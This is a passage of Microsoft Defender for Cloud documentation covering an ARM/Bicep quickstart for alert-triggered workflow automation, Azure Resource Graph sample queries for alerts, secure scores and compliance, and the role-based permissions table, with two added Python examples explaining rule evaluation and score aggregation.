  upon receiving a Microsoft Defender for Cloud alert that contains a specific string. 
- Microsoft.Logic/workflows: An empty triggerable Logic App. 


For other Defender for Cloud quickstart templates, see these community contributed 
templates. 


Deploy the template 


- PowerShell:

Azure PowerShell

New-AzResourceGroup -Name <resource-group-name> -Location <resource-group-location> # use this command when you need to create a new resource group for your deployment

New-AzResourceGroupDeployment -ResourceGroupName <resource-group-name> -TemplateUri https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/quickstarts/microsoft.security/securitycenter-create-automation-for-alertnamecontains/azuredeploy.json

- CLI:

Azure CLI

az group create --name <resource-group-name> --location <resource-group-location> # use this command when you need to create a new resource group for your deployment

az deployment group create --resource-group <resource-group-name> --template-uri https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/quickstarts/microsoft.security/securitycenter-create-automation-for-alertnamecontains/azuredeploy.json

- Portal:

[Deploy to Azure button]

To find more information about this deployment option, see Use a deployment button to deploy templates from GitHub repository.


Review deployed resources 

Use the Azure portal to check that the workflow automation has been deployed.

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. Select filter.
4. Select the specific subscription on which you deployed the new workflow automation.
5. From Microsoft Defender for Cloud's menu, open workflow automation and check for your new automation.

[Screenshot: the Workflow automation page for subscription 'Contoso', listing the automation 'Test' (Enabled, scope Contoso, trigger type Defender for Cloud alert, description 'Test automation', Logic App 'Test2').]

Tip

If you have many workflow automations on your subscription, use the filter by name option.


Clean up resources 
When no longer needed, delete the workflow automation using the Azure portal.

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. Select filter.
4. Select the specific subscription on which you deployed the new workflow automation.
5. From Microsoft Defender for Cloud's menu, open workflow automation and find the automation to be deleted.

[Screenshot: the Workflow automation page for subscription 'Contoso' with the automation 'Test' selected and the Delete command highlighted in the toolbar.]

6. Select the checkbox for the item to be deleted.
7. From the toolbar, select Delete.


Bicep tutorial 


Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources. It provides concise syntax, reliable type safety, and support for code reuse. Bicep offers the best authoring experience for your infrastructure-as-code solutions in Azure.


Review the Bicep file 


The Bicep file used in this quickstart is from Azure Quickstart Templates.


Bicep 


@minLength(3)
@maxLength(24)
param automationName string

@description('Location for the automation')
param location string = resourceGroup().location

@minLength(3)
param logicAppName string

@minLength(3)
param logicAppResourceGroupName string

@description('The Azure resource GUID id of the subscription')
param subscriptionId string = subscription().subscriptionId

@description('The alert settings object used for deploying the automation')
param alertSettings object

var automationDescription = 'automation description for subscription {0}'
var scopeDescription = 'automation scope for subscription {0}'

resource automation 'Microsoft.Security/automations@2019-01-01-preview' = {
  name: automationName
  location: location
  properties: {
    description: format(automationDescription, subscriptionId)
    isEnabled: true
    actions: [
      {
        actionType: 'LogicApp'
        logicAppResourceId: resourceId('Microsoft.Logic/workflows', logicAppName)
        uri: listCallbackURL(resourceId(subscriptionId, logicAppResourceGroupName, 'Microsoft.Logic/workflows/triggers', logicAppName, 'manual'), '2019-05-01').value
      }
    ]
    scopes: [
      {
        description: format(scopeDescription, subscriptionId)
        scopePath: subscription().id
      }
    ]
    sources: [
      {
        eventSource: 'Alerts'
        ruleSets: [for j in range(0, length(alertSettings.alertSeverityMapping)): {
          rules: [
            {
              propertyJPath: alertSettings.alertSeverityMapping[j].jpath
              propertyType: 'String'
              expectedValue: alertSettings.alertSeverityMapping[j].expectedValue
              operator: alertSettings.alertSeverityMapping[j].operator
            }
            {
              propertyJPath: 'Severity'
              propertyType: 'String'
              expectedValue: alertSettings.alertSeverityMapping[j].severity
              operator: 'Equals'
            }
          ]
        }]
      }
    ]
  }
}


Relevant resources 


- Microsoft.Security/automations: The automation that will trigger the logic app upon receiving a Microsoft Defender for Cloud alert that contains a specific string.
- Microsoft.Logic/workflows: An empty triggerable Logic App.

For other Defender for Cloud quickstart templates, see these community contributed templates.


Deploy the Bicep file 
1. Save the Bicep file as main.bicep to your local computer. 


2. Deploy the Bicep file using either Azure CLI or Azure PowerShell. 


CLI

Azure CLI

az group create --name exampleRG --location eastus

az deployment group create --resource-group exampleRG --template-file main.bicep --parameters automationName=<automation-name> logicAppName=<logic-name> logicAppResourceGroupName=<group-name> alertSettings={alert-settings}

You're required to enter the following parameters:

- automationName: Replace <automation-name> with the name of the automation. It has a minimum length of three characters and a maximum length of 24 characters.
- logicAppName: Replace <logic-name> with the name of the logic app. It has a minimum length of three characters.
- logicAppResourceGroupName: Replace <group-name> with the name of the resource group in which the resources are located. It has a minimum length of three characters.
- alertSettings: Replace {alert-settings} with the alert settings object used for deploying the automation.


O Note 


When the deployment finishes, you should see a message indicating the 
deployment succeeded. 
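Both the ARM and the Bicep versions of this quickstart take an alertSettings object, but neither section shows its shape. Its alertSeverityMapping array holds one entry per rule set, each with jpath, operator, expectedValue and severity, and the template turns every entry into a rule set of two rules: the caller's property rule plus a rule that the alert's Severity equals the mapped value. The Python below is an added example, not code from the original page or from the Azure Quickstart Templates repository. It renders a parameters file for that object (passing a JSON object inline as alertSettings={alert-settings} needs shell quoting; --parameters @params.json sidesteps that) and evaluates the resulting rule sets against constructed sample alerts the way a workflow automation does: every rule inside a rule set must match, and any matching rule set fires the action. The mapping values, the sample alerts, the automation and logic app names, and the case-sensitive string comparison are assumptions made for illustration.

```python
import json

# Constructed value for the template's alertSettings parameter. The jpath/expectedValue
# pairs are hypothetical; substitute the alert properties you actually want to route on.
ALERT_SETTINGS = {
    "alertSeverityMapping": [
        {"jpath": "AlertDisplayName", "operator": "Contains",
         "expectedValue": "Suspicious", "severity": "High"},
        {"jpath": "AlertType", "operator": "StartsWith",
         "expectedValue": "VM_", "severity": "Medium"},
    ]
}


def build_rule_sets(alert_settings):
    """Expand alertSeverityMapping the way the template's copy loop does: one rule set per
    mapping entry, each holding the caller's property rule and a Severity-equals rule."""
    rule_sets = []
    for m in alert_settings["alertSeverityMapping"]:
        rule_sets.append({"rules": [
            {"propertyJPath": m["jpath"], "propertyType": "String",
             "expectedValue": m["expectedValue"], "operator": m["operator"]},
            {"propertyJPath": "Severity", "propertyType": "String",
             "expectedValue": m["severity"], "operator": "Equals"},
        ]})
    return rule_sets


# String operators of the automation rule schema. Case-sensitive matching is an assumption
# of this local evaluator, not something the page documents.
_STRING_OPERATORS = {
    "Equals": lambda actual, expected: actual == expected,
    "Contains": lambda actual, expected: expected in actual,
    "StartsWith": lambda actual, expected: actual.startswith(expected),
    "EndsWith": lambda actual, expected: actual.endswith(expected),
}


def _lookup(alert, jpath):
    """Resolve a dotted JPath such as 'ExtendedProperties.resourceType' against an alert dict."""
    node = alert
    for part in jpath.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def rule_matches(alert, rule):
    actual = _lookup(alert, rule["propertyJPath"])
    if actual is None:
        return False  # a property the alert does not carry never satisfies a rule
    op = _STRING_OPERATORS.get(rule["operator"])
    if op is None:
        raise ValueError(f"unsupported operator {rule['operator']!r}")
    return op(str(actual), rule["expectedValue"])


def automation_fires(alert, rule_sets):
    """All rules in a rule set must match (AND); any matching rule set triggers the action (OR)."""
    return any(all(rule_matches(alert, r) for r in rs["rules"]) for rs in rule_sets)


def parameters_file(automation_name, logic_app_name, logic_app_rg, alert_settings):
    """Render an ARM parameters file usable as: az deployment group create --parameters @params.json"""
    return json.dumps({
        "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentParameters.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "automationName": {"value": automation_name},
            "logicAppName": {"value": logic_app_name},
            "logicAppResourceGroupName": {"value": logic_app_rg},
            "alertSettings": {"value": alert_settings},
        },
    }, indent=2)


# Constructed sample alerts; the field names follow the Defender for Cloud alert schema,
# the values are made up.
SAMPLE_ALERTS = {
    "high_suspicious": {"AlertDisplayName": "Suspicious process executed",
                        "AlertType": "VM_SuspiciousProcess", "Severity": "High"},
    "low_suspicious": {"AlertDisplayName": "Suspicious process executed",
                       "AlertType": "VM_SuspiciousProcess", "Severity": "Low"},
    "medium_mining": {"AlertDisplayName": "Digital currency mining",
                      "AlertType": "VM_DigitalCurrencyMining", "Severity": "Medium"},
}


def evaluate_samples(alert_settings=ALERT_SETTINGS):
    """Map each sample alert name to whether the automation would call the logic app."""
    rule_sets = build_rule_sets(alert_settings)
    return {name: automation_fires(alert, rule_sets) for name, alert in SAMPLE_ALERTS.items()}


if __name__ == "__main__":
    print(parameters_file("alert-to-logicapp", "my-logic-app", "my-rg", ALERT_SETTINGS))
    print(evaluate_samples())
```

The low_suspicious alert matches the text rule of the first mapping but not its Severity rule, so it does not fire: severity is ANDed into every rule set, which is what makes this template a severity-aware router rather than a plain substring filter. The az deployment group create and New-AzResourceGroupDeployment commands in the ARM section above prompt for any required parameter they are not given; a parameters file like the one produced here supplies all four at once.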


Review deployed resources 


Use the Azure portal, Azure CLI, or Azure PowerShell to list the deployed resources in the resource group.


CLI 


Azure CLI 


az resource list --resource-group exampleRG 


Clean up resources 


When no longer needed, use the Azure portal, Azure CLI, or Azure PowerShell to delete the resource group and all of its resources.


CLI 


Azure CLI 


az group delete --name exampleRG 


Next steps 


For step-by-step tutorials that guide you through the process of creating an ARM 
template or a Bicep file, see: 


Tutorial: Create and deploy your first ARM template 


Quickstart: Create Bicep files with Visual Studio Code 


Azure Resource Graph sample queries 
for Microsoft Defender for Cloud 


Article e 07/19/2023 


This page is a collection of Azure Resource Graph sample queries for Microsoft Defender 
for Cloud. For a complete list of Azure Resource Graph samples, see Resource Graph 
samples by Category and Resource Graph samples by Table. 


Sample queries 


Display all active Microsoft Defender for Cloud alerts 
Returns a list of all active alerts in your Microsoft Defender for Cloud tenant. 
Kusto 


securityresources
| where type =~ 'microsoft.security/locations/alerts'
| where properties.Status in ('Active')
| where properties.Severity in ('Low', 'Medium', 'High')
| project alert_type = tostring(properties.AlertType), SystemAlertId = tostring(properties.SystemAlertId), ResourceIdentifiers = todynamic(properties.ResourceIdentifiers)


Azure CLI

az graph query -q "securityresources | where type =~ 'microsoft.security/locations/alerts' | where properties.Status in ('Active') | where properties.Severity in ('Low', 'Medium', 'High') | project alert_type = tostring(properties.AlertType), SystemAlertId = tostring(properties.SystemAlertId), ResourceIdentifiers = todynamic(properties.ResourceIdentifiers)"


Controls secure score per subscription 
Returns controls secure score per subscription. 


Kusto 


SecurityResources
| where type == 'microsoft.security/securescores/securescorecontrols'
| extend controlName=properties.displayName,
    controlId=properties.definition.name,
    notApplicableResourceCount=properties.notApplicableResourceCount,
    unhealthyResourceCount=properties.unhealthyResourceCount,
    healthyResourceCount=properties.healthyResourceCount,
    percentageScore=properties.score.percentage,
    currentScore=properties.score.current,
    maxScore=properties.definition.properties.maxScore,
    weight=properties.weight,
    controlType=properties.definition.properties.source.sourceType,
    controlRecommendationIds=properties.definition.properties.assessmentDefinitions
| project tenantId, subscriptionId, controlName, controlId, unhealthyResourceCount, healthyResourceCount, notApplicableResourceCount, percentageScore, currentScore, maxScore, weight, controlType, controlRecommendationIds


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/securescores/securescorecontrols' | extend controlName=properties.displayName, controlId=properties.definition.name, notApplicableResourceCount=properties.notApplicableResourceCount, unhealthyResourceCount=properties.unhealthyResourceCount, healthyResourceCount=properties.healthyResourceCount, percentageScore=properties.score.percentage, currentScore=properties.score.current, maxScore=properties.definition.properties.maxScore, weight=properties.weight, controlType=properties.definition.properties.source.sourceType, controlRecommendationIds=properties.definition.properties.assessmentDefinitions | project tenantId, subscriptionId, controlName, controlId, unhealthyResourceCount, healthyResourceCount, notApplicableResourceCount, percentageScore, currentScore, maxScore, weight, controlType, controlRecommendationIds"


Count healthy, unhealthy, and not applicable resources 
per recommendation 


Returns count of healthy, unhealthy, and not applicable resources per recommendation. 
Use summarize and count to define how to group and aggregate the values by property. 


Kusto 


SecurityResources
| where type == 'microsoft.security/assessments'
| extend resourceId=id,
    recommendationId=name,
    resourceType=type,
    recommendationName=properties.displayName,
    source=properties.resourceDetails.Source,
    recommendationState=properties.status.code,
    description=properties.metadata.description,
    assessmentType=properties.metadata.assessmentType,
    remediationDescription=properties.metadata.remediationDescription,
    policyDefinitionId=properties.metadata.policyDefinitionId,
    implementationEffort=properties.metadata.implementationEffort,
    recommendationSeverity=properties.metadata.severity,
    category=properties.metadata.categories,
    userImpact=properties.metadata.userImpact,
    threats=properties.metadata.threats,
    portalLink=properties.links.azurePortal
| summarize numberOfResources=count(resourceId) by tostring(recommendationName), tostring(recommendationState)


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/assessments' | extend resourceId=id, recommendationId=name, resourceType=type, recommendationName=properties.displayName, source=properties.resourceDetails.Source, recommendationState=properties.status.code, description=properties.metadata.description, assessmentType=properties.metadata.assessmentType, remediationDescription=properties.metadata.remediationDescription, policyDefinitionId=properties.metadata.policyDefinitionId, implementationEffort=properties.metadata.implementationEffort, recommendationSeverity=properties.metadata.severity, category=properties.metadata.categories, userImpact=properties.metadata.userImpact, threats=properties.metadata.threats, portalLink=properties.links.azurePortal | summarize numberOfResources=count(resourceId) by tostring(recommendationName), tostring(recommendationState)"


Get all loT alerts on hub, filtered by type 


Returns all loT alerts for a specific hub (replace placeholder {hub_id}) and alert type 
(replace placeholder {alert_type} ). 


Kusto

SecurityResources
| where type =~ 'microsoft.security/iotalerts' and id contains '{hub_id}' and properties.alertType contains '{alert_type}'


Azure CLI

az graph query -q "SecurityResources | where type =~ 'microsoft.security/iotalerts' and id contains '{hub_id}' and properties.alertType contains '{alert_type}'"


Get sensitivity insight of a specific resource 


Returns sensitivity insight of a specific resource (replace placeholder {resource_id}). 


Kusto 


SecurityResources
| where type == 'microsoft.security/insights/classification'
| where properties.associatedResource contains '$resource_id'
| project SensitivityInsight = properties.insightProperties.purviewCatalogs[0].sensitivity


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/insights/classification' | where properties.associatedResource contains '\$resource_id' | project SensitivityInsight = properties.insightProperties.purviewCatalogs[0].sensitivity"


Get specific loT alert 


Returns specific loT alert by a provided system alert ID (replace placeholder 
{system _Alert_Id}) 


Kusto 


SecurityResources
| where type =~ 'microsoft.security/iotalerts' and properties.systemAlertId contains '{system_Alert_Id}'


Azure CLI

az graph query -q "SecurityResources | where type =~ 'microsoft.security/iotalerts' and properties.systemAlertId contains '{system_Alert_Id}'"


List Container Registry vulnerability assessment results 


Returns all the vulnerabilities found on container images. Microsoft Defender for Containers has to be enabled in order to view these security findings.


Kusto 


SecurityResources
| where type == 'microsoft.security/assessments'
| where properties.displayName contains 'Container registry images should have vulnerability findings resolved'
| summarize by assessmentKey=name //the ID of the assessment
| join kind=inner (
    securityresources
    | where type == 'microsoft.security/assessments/subassessments'
    | extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id)
) on assessmentKey
| project assessmentKey, subassessmentKey=name, id, parse_json(properties), resourceGroup, subscriptionId, tenantId
| extend description = properties.description,
    displayName = properties.displayName,
    resourceId = properties.resourceDetails.id,
    resourceSource = properties.resourceDetails.source,
    category = properties.category,
    severity = properties.status.severity,
    code = properties.status.code,
    timeGenerated = properties.timeGenerated,
    remediation = properties.remediation,
    impact = properties.impact,
    vulnId = properties.id,
    additionalData = properties.additionalData


Azure CLI

The one-line form omits the //the ID of the assessment comment from the Kusto version: inside a single-line query a // comment runs to the end of the string and would swallow the rest of the pipeline.

az graph query -q "SecurityResources | where type == 'microsoft.security/assessments' | where properties.displayName contains 'Container registry images should have vulnerability findings resolved' | summarize by assessmentKey=name | join kind=inner ( securityresources | where type == 'microsoft.security/assessments/subassessments' | extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id) ) on assessmentKey | project assessmentKey, subassessmentKey=name, id, parse_json(properties), resourceGroup, subscriptionId, tenantId | extend description = properties.description, displayName = properties.displayName, resourceId = properties.resourceDetails.id, resourceSource = properties.resourceDetails.source, category = properties.category, severity = properties.status.severity, code = properties.status.code, timeGenerated = properties.timeGenerated, remediation = properties.remediation, impact = properties.impact, vulnId = properties.id, additionalData = properties.additionalData"


List Microsoft Defender recommendations 


Returns all Microsoft Defender assessments, organized in tabular manner with field per 
property. 


Kusto 


SecurityResources
| where type == 'microsoft.security/assessments'
| extend resourceId=id,
    recommendationId=name,
    recommendationName=properties.displayName,
    source=properties.resourceDetails.Source,
    recommendationState=properties.status.code,
    description=properties.metadata.description,
    assessmentType=properties.metadata.assessmentType,
    remediationDescription=properties.metadata.remediationDescription,
    policyDefinitionId=properties.metadata.policyDefinitionId,
    implementationEffort=properties.metadata.implementationEffort,
    recommendationSeverity=properties.metadata.severity,
    category=properties.metadata.categories,
    userImpact=properties.metadata.userImpact,
    threats=properties.metadata.threats,
    portalLink=properties.links.azurePortal
| project tenantId, subscriptionId, resourceId, recommendationName, recommendationId, recommendationState, recommendationSeverity, description, remediationDescription, assessmentType, policyDefinitionId, implementationEffort, userImpact, category, threats, source, portalLink


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/assessments' | extend resourceId=id, recommendationId=name, recommendationName=properties.displayName, source=properties.resourceDetails.Source, recommendationState=properties.status.code, description=properties.metadata.description, assessmentType=properties.metadata.assessmentType, remediationDescription=properties.metadata.remediationDescription, policyDefinitionId=properties.metadata.policyDefinitionId, implementationEffort=properties.metadata.implementationEffort, recommendationSeverity=properties.metadata.severity, category=properties.metadata.categories, userImpact=properties.metadata.userImpact, threats=properties.metadata.threats, portalLink=properties.links.azurePortal | project tenantId, subscriptionId, resourceId, recommendationName, recommendationId, recommendationState, recommendationSeverity, description, remediationDescription, assessmentType, policyDefinitionId, implementationEffort, userImpact, category, threats, source, portalLink"


List Qualys vulnerability assessment results 


Returns all the vulnerabilities found on virtual machines that have a Qualys agent 
installed. 


Kusto 


SecurityResources
| where type == 'microsoft.security/assessments'
| where * contains 'vulnerabilities in your virtual machines'
| summarize by assessmentKey=name //the ID of the assessment
| join kind=inner (
    securityresources
    | where type == 'microsoft.security/assessments/subassessments'
    | extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id)
) on assessmentKey
| project assessmentKey, subassessmentKey=name, id, parse_json(properties), resourceGroup, subscriptionId, tenantId
| extend description = properties.description,
    displayName = properties.displayName,
    resourceId = properties.resourceDetails.id,
    resourceSource = properties.resourceDetails.source,
    category = properties.category,
    severity = properties.status.severity,
    code = properties.status.code,
    timeGenerated = properties.timeGenerated,
    remediation = properties.remediation,
    impact = properties.impact,
    vulnId = properties.id,
    additionalData = properties.additionalData


Azure CLI

As with the container registry sample, the one-line form drops the // comment so that it cannot comment out the rest of the query.

az graph query -q "SecurityResources | where type == 'microsoft.security/assessments' | where * contains 'vulnerabilities in your virtual machines' | summarize by assessmentKey=name | join kind=inner ( securityresources | where type == 'microsoft.security/assessments/subassessments' | extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id) ) on assessmentKey | project assessmentKey, subassessmentKey=name, id, parse_json(properties), resourceGroup, subscriptionId, tenantId | extend description = properties.description, displayName = properties.displayName, resourceId = properties.resourceDetails.id, resourceSource = properties.resourceDetails.source, category = properties.category, severity = properties.status.severity, code = properties.status.code, timeGenerated = properties.timeGenerated, remediation = properties.remediation, impact = properties.impact, vulnId = properties.id, additionalData = properties.additionalData"


Regulatory compliance assessments state 
Returns regulatory compliance assessments state per compliance standard and control. 
Kusto 


SecurityResources
| where type == 'microsoft.security/regulatorycompliancestandards/regulatorycompliancecontrols/regulatorycomplianceassessments'
| extend assessmentName=properties.description,
    complianceStandard=extract(@'/regulatoryComplianceStandards/(.+)/regulatoryComplianceControls',1,id),
    complianceControl=extract(@'/regulatoryComplianceControls/(.+)/regulatoryComplianceAssessments',1,id),
    skippedResources=properties.skippedResources,
    passedResources=properties.passedResources,
    failedResources=properties.failedResources,
    state=properties.state
| project tenantId, subscriptionId, id, complianceStandard, complianceControl, assessmentName, state, skippedResources, passedResources, failedResources


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/regulatorycompliancestandards/regulatorycompliancecontrols/regulatorycomplianceassessments' | extend assessmentName=properties.description, complianceStandard=extract(@'/regulatoryComplianceStandards/(.+)/regulatoryComplianceControls',1,id), complianceControl=extract(@'/regulatoryComplianceControls/(.+)/regulatoryComplianceAssessments',1,id), skippedResources=properties.skippedResources, passedResources=properties.passedResources, failedResources=properties.failedResources, state=properties.state | project tenantId, subscriptionId, id, complianceStandard, complianceControl, assessmentName, state, skippedResources, passedResources, failedResources"


Regulatory compliance state per compliance standard 
Returns regulatory compliance state per compliance standard per subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/regulatorycompliancestandards' 

| extend complianceStandard=name, 
state=properties.state, 
passedControls=properties.passedControls, 
failedControls=properties.failedControls, 
skippedControls=properties.skippedControls, 
unsupportedControls=properties.unsupportedControls 

| project tenantId, subscriptionId, complianceStandard, state, 

passedControls, failedControls, skippedControls, unsupportedControls 


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/regulatorycompliancestandards' | extend complianceStandard=name, state=properties.state, passedControls=properties.passedControls, failedControls=properties.failedControls, skippedControls=properties.skippedControls, unsupportedControls=properties.unsupportedControls | project tenantId, subscriptionId, complianceStandard, state, passedControls, failedControls, skippedControls, unsupportedControls"


Secure score per management group 
Returns secure score per management group. 
Kusto 


SecurityResources
| where type == 'microsoft.security/securescores'
| project subscriptionId,
    subscriptionTotal = iff(properties.score.max == 0, 0.00, round(tolong(properties.weight) * todouble(properties.score.current)/tolong(properties.score.max),2)),
    weight = tolong(iff(properties.weight == 0, 1, properties.weight))
| join kind=leftouter (
    ResourceContainers
    | where type == 'microsoft.resources/subscriptions' and properties.state == 'Enabled'
    | project subscriptionId, mgChain=properties.managementGroupAncestorsChain
) on subscriptionId
| mv-expand mg=mgChain
| summarize sumSubs = sum(subscriptionTotal), sumWeight = sum(weight), resultsNum = count() by tostring(mg.displayName), mgId = tostring(mg.name)
| extend secureScore = iff(tolong(resultsNum) == 0, 404.00, round(sumSubs/sumWeight*100, 2))
| project mgName=mg_displayName, mgId, sumSubs, sumWeight, resultsNum, secureScore
| order by mgName asc


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/securescores' | project subscriptionId, subscriptionTotal = iff(properties.score.max == 0, 0.00, round(tolong(properties.weight) * todouble(properties.score.current)/tolong(properties.score.max),2)), weight = tolong(iff(properties.weight == 0, 1, properties.weight)) | join kind=leftouter ( ResourceContainers | where type == 'microsoft.resources/subscriptions' and properties.state == 'Enabled' | project subscriptionId, mgChain=properties.managementGroupAncestorsChain ) on subscriptionId | mv-expand mg=mgChain | summarize sumSubs = sum(subscriptionTotal), sumWeight = sum(weight), resultsNum = count() by tostring(mg.displayName), mgId = tostring(mg.name) | extend secureScore = iff(tolong(resultsNum) == 0, 404.00, round(sumSubs/sumWeight*100,2)) | project mgName=mg_displayName, mgId, sumSubs, sumWeight, resultsNum, secureScore | order by mgName asc"
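The management-group query above rolls each subscription's secure score up through every ancestor in managementGroupAncestorsChain as a weighted mean: a subscription contributes weight times current/max to its own total, the mv-expand copies that total into each ancestor group, and a group's score is the sum of those totals over the sum of weights. The Python below is an added example, not code from the original page; it replicates that pipeline locally over constructed rows so the meaning of the sumSubs, sumWeight and secureScore columns can be checked before the numbers land in a dashboard. The subscription IDs, scores, weights and management-group names are made up, and the leftouter join, the Enabled filter, the zero-weight floor to 1 and the 404.00 placeholder for empty groups mirror the query.

```python
from collections import defaultdict

# Constructed rows shaped like the two Resource Graph tables the query joins (illustrative values).
SECURE_SCORES = [  # microsoft.security/securescores: one row per subscription
    {"subscriptionId": "sub-a", "score": {"current": 30.0, "max": 60}, "weight": 100},
    {"subscriptionId": "sub-b", "score": {"current": 58.0, "max": 58}, "weight": 25},
    {"subscriptionId": "sub-c", "score": {"current": 0.0, "max": 0}, "weight": 0},  # nothing assessed yet
]
ROOT = {"name": "mg-root", "displayName": "Tenant Root Group"}
SUBSCRIPTIONS = [  # microsoft.resources/subscriptions with managementGroupAncestorsChain
    {"subscriptionId": "sub-a", "state": "Enabled",
     "mgChain": [{"name": "mg-prod", "displayName": "Production"}, ROOT]},
    {"subscriptionId": "sub-b", "state": "Enabled",
     "mgChain": [{"name": "mg-dev", "displayName": "Development"}, ROOT]},
    {"subscriptionId": "sub-c", "state": "Enabled",
     "mgChain": [{"name": "mg-dev", "displayName": "Development"}, ROOT]},
]


def subscription_totals(scores):
    """First project stage of the query. The weighted total uses the raw weight (a weight of 0
    therefore contributes 0), while the weight carried into the sum is floored to 1 so that a
    zero-weight subscription cannot produce a division by zero further down."""
    rows = {}
    for s in scores:
        cur, mx, w = s["score"]["current"], s["score"]["max"], s["weight"]
        total = 0.0 if mx == 0 else round(w * cur / mx, 2)
        rows[s["subscriptionId"]] = (total, w if w != 0 else 1)
    return rows


def management_group_scores(scores, subscriptions):
    """join + mv-expand + summarize: every ancestor management group receives the subscription's
    total and weight, so a parent group's score is the weighted mean of everything beneath it."""
    totals = subscription_totals(scores)
    chains = {s["subscriptionId"]: s["mgChain"]
              for s in subscriptions if s["state"] == "Enabled"}  # the query's Enabled filter
    acc = defaultdict(lambda: {"mgName": None, "sumSubs": 0.0, "sumWeight": 0, "resultsNum": 0})
    for sub_id, (total, weight) in totals.items():
        for mg in chains.get(sub_id, []):  # leftouter join: a subscription without a chain adds no rows
            a = acc[mg["name"]]
            a["mgName"] = mg["displayName"]
            a["sumSubs"] += total
            a["sumWeight"] += weight
            a["resultsNum"] += 1
    for a in acc.values():
        # 404.00 is the query's sentinel for a group that gathered no subscriptions at all
        a["secureScore"] = 404.00 if a["resultsNum"] == 0 else round(a["sumSubs"] / a["sumWeight"] * 100, 2)
    return dict(sorted(acc.items(), key=lambda kv: kv[1]["mgName"]))  # order by mgName asc


if __name__ == "__main__":
    for mg_id, row in management_group_scores(SECURE_SCORES, SUBSCRIPTIONS).items():
        print(mg_id, row)
```

With these rows the Development group scores 96.15 although one of its two subscriptions has nothing assessed, because that subscription enters the mean with weight 1 and total 0; the Tenant Root Group aggregates all three. A group whose only subscriptions are Disabled never appears, since the Enabled filter removes them before the mv-expand.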


Secure score per subscription 
Returns secure score per subscription. 
Kusto 


SecurityResources 
| where type == 'microsoft.security/securescores' 
| extend percentageScore=properties.score.percentage, 
currentScore=properties.score.current, 
maxScore=properties.score.max, 
weight=properties.weight 
| project tenantId, subscriptionId, percentageScore, currentScore, maxScore, 
weight 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
'microsoft.security/securescores' | extend 
percentageScore=properties.score.percentage, 
currentScore=properties.score.current, maxScore=properties.score.max, 
weight=properties.weight | project tenantId, subscriptionId, 
percentageScore, currentScore, maxScore, weight" 


Show Defender for Cloud plan pricing tier per 
subscription 


Returns Defender for Cloud plan pricing tier plan per subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/pricings' 

| project Subscription= subscriptionId, Azure_Defender_plan= name, Status= 
properties.pricingTier 


Azure CLI

az graph query -q "SecurityResources | where type == 'microsoft.security/pricings' | project Subscription= subscriptionId, Azure_Defender_plan= name, Status= properties.pricingTier"


Next steps 


e Learn more about the query language. 

e Learn more about how to explore resources. 
e See samples of Starter language queries. 

e See samples of Advanced language queries. 


User roles and permissions 


Article e 10/09/2023 


Microsoft Defender for Cloud uses Azure role-based access control (Azure RBAC) to 
provide built-in roles. You can assign these roles to users, groups, and services in Azure 


to give users access to resources according to the access defined in the role. 


Defender for Cloud assesses the configuration of your resources to identify security issues and vulnerabilities. In Defender for Cloud, you only see information related to a resource when you're assigned one of these roles for the subscription or for the resource group the resource is in: Owner, Contributor, or Reader.


In addition to the built-in roles, there are two roles specific to Defender for Cloud: 


e Security Reader: A user that belongs to this role has read-only access to Defender 
for Cloud. The user can view recommendations, alerts, a security policy, and 
security states, but can't make changes. 

e Security Admin: A user that belongs to this role has the same access as the 
Security Reader and can also update the security policy, and dismiss alerts and 
recommendations. 


We recommend that you assign the least permissive role needed for users to complete 
their tasks. For example, assign the Reader role to users who only need to view 
information about the security health of a resource but not take action, such as applying 


recommendations or editing policies. 


Roles and allowed actions 


The following table displays roles and allowed actions in Defender for Cloud. 


Action | Security Reader / Reader | Security Admin | Contributor / Owner (Resource group level) | Contributor (Subscription level) | Owner (Subscription level)
Add/assign initiatives (including regulatory compliance standards) | - | ✓ | - | - | ✓
Edit security policy | - | ✓ | - | - | ✓
Enable / disable Microsoft Defender plans | - | ✓ | - | ✓ | ✓
Dismiss alerts | - | ✓ | - | ✓ | ✓
Apply security recommendations for a resource (and use Fix) | - | - | ✓ | ✓ | ✓
View alerts and recommendations | ✓ | ✓ | ✓ | ✓ | ✓
Exempt security recommendations | - | - | ✓ | ✓ | ✓

The specific role required to deploy monitoring components depends on the extension 
you're deploying. Learn more about monitoring components. 


Roles used to automatically provision agents 
and extensions 


To allow the Security Admin role to automatically provision agents and extensions used in Defender for Cloud plans, Defender for Cloud uses policy remediation in a similar way to Azure Policy. To use remediation, Defender for Cloud needs to create service principals (managed identities) that are assigned roles at the subscription level. For example, the service principals for the Defender for Containers plan are:


Service Principal | Roles
Defender for Containers provisioning AKS Security Profile | Kubernetes Extension Contributor; Contributor; Azure Kubernetes Service Contributor; Log Analytics Contributor
Defender for Containers provisioning Arc-enabled Kubernetes | Azure Kubernetes Service Contributor; Kubernetes Extension Contributor; Contributor; Log Analytics Contributor
Defender for Containers provisioning Azure Policy for Kubernetes | Kubernetes Extension Contributor; Contributor; Azure Kubernetes Service Contributor
Defender for Containers provisioning Policy extension for Arc-enabled Kubernetes | Azure Kubernetes Service Contributor; Kubernetes Extension Contributor; Contributor

Next steps 


This article explained how Defender for Cloud uses Azure RBAC to assign permissions to 
users and identified the allowed actions for each role. Now that you're familiar with the 
role assignments needed to monitor the security state of your subscription, edit security 
policies, and apply recommendations, learn how to: 


